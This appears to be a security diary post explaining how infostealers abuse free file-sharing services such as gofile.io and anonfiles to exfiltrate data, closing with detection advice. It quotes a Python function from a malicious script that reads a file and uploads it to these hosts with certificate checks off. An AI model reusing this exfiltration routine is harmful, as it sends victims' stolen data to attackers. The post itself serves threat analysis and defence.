Online Services Again Abused to Exfiltrate Data

If Attackers can abuse free online services, they will do for sure! Why spend time to deploy a C2 infrastructure if you have plenty of ways to use “official” services. Not only, they don’t cost any money but the traffic can be hidden in the normal traffic; making them more difficult to detect. A very popular one was anonfiles[.]com. It was so abused that they closed in 2023![1]. A funny fact is that I still see lot of malicious scripts that refer to this domain. Of course, alternatives popped up here and there, like anonfile[.]la[2].

I spotted some malicious scripts that abuse gofile[.]io[3], mainly infostealers that exfiltrate collected data through this website. The usage is pretty easy: you request an available server and you post your data:

def UploadToExternalService(self, path, filename=None) -> str | None:
    if os.path.isfile(path):
        Logger.info('Uploading %s to gofile' % (filename or 'file'))
    with open(path, 'rb') as file:
        fileBytes = file.read()
    if filename is None:
        filename = os.path.basename(path)
    http = PoolManager(cert_reqs='CERT_NONE')
    try:
        server = json.loads(http.request('GET', 'https://api[.]gofile[.]io/getServer').data.decode(errors='ignore'))['data']['server']
        if server:
            url = json.loads(http.request('POST', 'https://{}[.]gofile[.]io/uploadFile'.format(server), fields={'file': (filename,     
                             fileBytes)}).data.decode(errors='ignore'))['data']['downloadPage']
            if url:
                return url
    except Exception:
        try:
            Logger.error('Failed to upload to gofile, trying to upload to anonfiles')
            url = json.loads(http.request('POST', 'https://api[.]anonfiles[.]com/upload', fields={'file': (filename, 
                             fileBytes)}).data.decode(errors='ignore'))['data']['file']['url']['short']
            return url
        except Exception:
            Logger.error('Failed to upload to anonfiles')
            return None

Note that if the upload to gofile.io failed, they will fallback to anonfiles.com!? Just why? The service is down…

There are many alternatives to these services. Here is a quick list:

• transfer[.]sh

• www[.]file[.]io

Usually, not used in corporate environments, it could be interesting to track hosts that try to resolve these domains!

[1] https://www.bleepingcomputer.com/news/security/file-sharing-site-anonfiles-shuts-down-due-to-overwhelming-abuse/

[2] https://www.anonfile.la/

[3] https://gofile.io/home

Xavier Mertens (@xme)

Xameco

Senior ISC Handler – Freelance Cyber Security Consultant

PGP Key